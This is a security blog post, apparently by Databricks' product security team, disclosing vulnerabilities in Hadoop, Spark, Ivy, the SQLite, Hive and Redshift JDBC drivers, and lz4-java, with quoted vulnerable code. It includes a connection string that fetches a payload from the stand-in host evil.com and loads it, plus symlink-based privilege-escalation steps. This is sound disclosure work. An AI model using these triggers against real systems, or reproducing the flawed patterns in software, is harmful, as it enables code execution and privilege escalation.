Open Source Security at Databricks

Open Source Security at Databricks


The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.

This blog will provide an overview of the technical details of some of the vulnerabilities that the team discovered.

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also using gzip, and executes it. The issue lies in the fact that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands in the archive name, via shell metacharacters for example.

The vulnerable code can be found here.

untarCommand.append("cd '")
     .append(FileUtil.makeSecureShellPath(untarDir))
     .append("' && ")
     .append("tar -xf ");

if (gzipped) {
  untarCommand.append(" -)");
} else {
  untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();

Note that makeSecureShellPath only escapes single quotes but doesn’t add any. There were some debates as to the consequences of the issue for Hadoop itself, but in the end since it is a publicly offered API, it ended up warranting a fix. Databricks was invested in fixing this issue as the Spark code for unpack was leveraging the vulnerable code.

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

Apache Spark™ uses some API to map a given user name to a set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing for arbitrary command injection.

The vulnerable code could be found here

  // shells out a "bash -c id -Gn username" to get user groups
  private def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)  // <== potential command injection!
    // we need to get rid of the trailing "n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
  }

We had to figure out if this provider could be reached with untrusted user input, and found the following path:

  1. ShellBasedGroupsMappingProvider.getGroups
  2. Utils.getCurrentUserGroups
  3. SecurityManager.isUserInACL
  4. SecurityManager.checkUIViewPermissions
  5. HttpSecurityFilter.doFilter

Ironically, the Spark UI HTTP security filter could allow that code to reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability to be triggerable in a default configuration.

Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking didn’t check for “../” in the Zip entry names, allowing for a directory traversal type of attack, also known as “zip slip”.

The vulnerable code could be found here.

while (((entry = zip.getNextEntry()) != null)) {
    File f = new File(dest, entry.getName());  // <== no check on the name of the entry!
    Message.verbose("ttexpanding " + entry.getName() + " to " + f);
    // create intermediary directories - sometimes zip don't add them
    File dirF = f.getParentFile();
    if (dirF != null) {
        dirF.mkdirs();
    }
    if (entry.isDirectory()) {
        f.mkdirs();
    } else {
        writeFile(zip, f);
    }
    f.setLastModified(entry.getTime());
}

This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.

CVE-2023-32697: SQLite JDBC driver remote code execution

SQLite JDBC driver can be made to load a remote extension due to the predictable temporary file naming when loading a remote database file using jdbc:sqlite::resource and enable_load_extension options that enable extension loading.

The main issue is using hashCode method to generate a temporary name without taking into account that hashCode will produce the same output for the same string across JVMs, an attacker can predict the output and, therefore, the location of the download file.

The vulnerable code can be found here.

String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable temporary file
File dbFile = new File(tempFolder, dbFileName);

While the issue can be triggered in one step, here is a breakdown for simplicity: 

Using the following connection string: jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true

This will result in downloading the .so file in a predictable location in the /tmp folder, and can be later loaded using: select load_extension(‘/tmp/sqlite-jdbc-tmp-{NUMBER}.db’)

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

JDBC driver scrutiny has increased in the last few years, thanks to the work of people like pyn3rd, who presented their work at Security Conferences worldwide, notably “Make JDBC Attack Brilliant Again.” This issue is just a byproduct of their work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.

The core of the issue resides in the openBrowserWindow function that can be found here.

//Desktop is not supported, lets try to open the browser process
OsType os = getOperatingSystem();
switch (os) {
  case WINDOWS:
    Runtime.getRuntime()
        .exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
    break;
  case MAC:
    Runtime.getRuntime().exec("open " + ssoUri.toString());
    break;
  case LINUX:
    Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
    break;

This function will execute a command based on the redirect URI that could potentially be provided by an untrusted source.

To trigger the issue, one can specify a connection string such as: jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true which uses the browser authentication mechanism, with an endpoint that will return a 302 and specify a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoURI is a Java URI restricts the freedom that an attacker would have with their crafted command line.

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Spark’s ThriftHttpServlet can be made to accept a cookie that will serve as a way to authenticate a user. It is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (the default value for this option depends on the project, but some of them have it set to true). The validateCookie function will be used to verify it, which will ultimately call CookieSigner.verifyAndExtract. The issue resides in the fact that on verification failure, an exception will be raised that will return both the received signature and the expected valid one, allowing a user to send the request again with said valid signature.  

The vulnerable code can be found here.

if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
  throw new IllegalArgumentException("Invalid sign, original = " + originalSignature +
    " current = " + currentSignature);  // <== output the actual expected signature!
}

Example output returned to the client:

java.lang.IllegalArgumentException: Invalid sign, original = AAAA current = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
    at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)

Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:

The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when dealing with reporting vulnerabilities to Open Source projects:

  • May 16, 2023: reported to [email protected]
  • May 17, 2023: acknowledged
  • Jun 9, 2023: requested update on the case
  • Jun 12, 2023: reply that this may be a security issue
  • Oct 16, 2023: requested an update on the case
  • Oct 17, 2023: reply that a patch can be applied to Spark, but the status on the Hive side is unclear
  • Nov 6, 2023: requested an update on the case
  • Dec 4, 2023: requested an update on the case after noticing that the issue is publicly fixed in Hive and Spark
  • Feb 7, 2024: requested an update on the case
  • Feb 23, 2024: release of Spark 3.5.1
  • Mar 5, 2024: requested an update on the case
  • Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark side
  • Mar 29, 2024: release of Hive 4.0.0
  • Apr 19, 2024: announcing that we will publish details of the issue since it’s been more than a year, with little to no updates from the relevant Apache PMCs

Redshift JDBC Arbitrary File Append

The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that enables database connectivity using the standard JDBC APIs provided in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.

If the JDBC driver is extended across a privilege boundary, an attacker can use the Redshift JDBC Driver’s logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines / arbitrary characters and can be used to elevate privileges.

In the connection URL, a “LogPath” variable can be used to supply the path in which log files should be stored.

This results in files such as “redshift_jdbc_connection_XX.log,” where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.

By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.

The source code for the Redshift JDBC logfile handling is available at the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225

To recreate this, you can create a directory in tmp, such as “/tmp/logging.” Within this directory, the user must create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the log file increments each time the redshift JDBC connector is used.

These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, following the symlink and appending it to the file.

LZ4 Java arbitrary file write privilege escalation

The lz4-java library (a java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when a compiled library is dropped onto a disk. Large Java applications such as Spark and Hadoop use this library heavily. 

The following code demonstrates this vulnerability:

File tempLib = null;
File tempLibLock = null;
try {
  // Create the .lck file first to avoid a race condition
  // with other concurrently running Java processes using lz4-java.
  tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
  tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));
  // copy to tempLib
  try (FileOutputStream out = new FileOutputStream(tempLib)) {
    byte[] buf = new byte[4096];
    while (true) {
    int read = is.read(buf);
    if (read == -1) {
      break;
    }
    out.write(buf, 0, read);
  }
}
System.load(tempLib.getAbsolutePath());

As you can see, this code writes out a .so stored within the jar file to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant version of the file with a .lck extension for the assumed purpose of stopping collisions from other processes using the library. However, this .lck file will allow an attacker watching the directory to attempt to race the creation of the file after receiving the filename from the .lck creation and creating a symbolic link pointing anywhere on the filesystem.

The ramifications of this are twofold: first, the attacker will be able to overwrite any file on the system with the contents of this .so file. This may allow an unprivileged attacker to overwrite root owned files. Second, the symlink can be replaced between writing and loading, allowing the attacker to load a custom shared object they provide as root. If this library is used across a privilege boundary, this may grant an attacker with code execution at an elevated privilege level.

Conclusion

At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.



Source link
lol

By stp2y

Leave a Reply

Your email address will not be published. Required fields are marked *

No widgets found. Go to Widget page and add the widget in Offcanvas Sidebar Widget Area.